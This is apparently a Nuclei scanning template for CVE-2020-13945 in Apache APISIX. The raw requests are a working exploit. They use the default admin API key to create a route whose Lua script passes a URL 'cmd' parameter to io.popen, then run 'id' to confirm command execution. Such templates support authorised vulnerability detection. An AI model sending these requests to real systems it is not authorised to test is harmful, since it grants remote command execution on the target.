id: CVE-2020-13945 info: name: Apache APISIX - Insufficiently Protected Credentials author: pdteam severity: medium description: Apache APISIX 1.2, 1.3, 1.4, and 1.5 is susceptible to insufficiently protected credentials. An attacker can enable the Admin API and delete the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data. remediation: | Upgrade to the latest version of Apache APISIX, which includes a fix for the vulnerability. Additionally, ensure that sensitive credentials are properly protected and stored securely. reference: - https://github.com/vulhub/vulhub/tree/master/apisix/CVE-2020-13945 - https://lists.apache.org/thread.html/r792feb29964067a4108f53e8579a1e9bd1c8b5b9bc95618c814faf2f%40%3Cdev.apisix.apache.org%3E - http://packetstormsecurity.com/files/166228/Apache-APISIX-Remote-Code-Execution.html - https://nvd.nist.gov/vuln/detail/CVE-2020-13945 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2020-13945 cwe-id: CWE-522 epss-score: 0.00522 epss-percentile: 0.73906 cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache product: apisix tags: intrusive,vulhub,packetstorm,cve,cve2020,apache,apisix http: - raw: - | POST /apisix/admin/routes HTTP/1.1 Host: {{Hostname}} X-API-KEY: edd1c9f034335f136f87ad84b625c8f1 Content-Type: application/json { "uri":"/{{randstr}}", "script":"local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M", "upstream":{ "type":"roundrobin", "nodes":{ "interact.sh:80":1 } } } - | GET /{{randstr}}?cmd=id HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word words: - '"action":"create"' - '"script":' - '"node":' condition: and - type: status status: - 201 extractors: - type: regex regex: - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"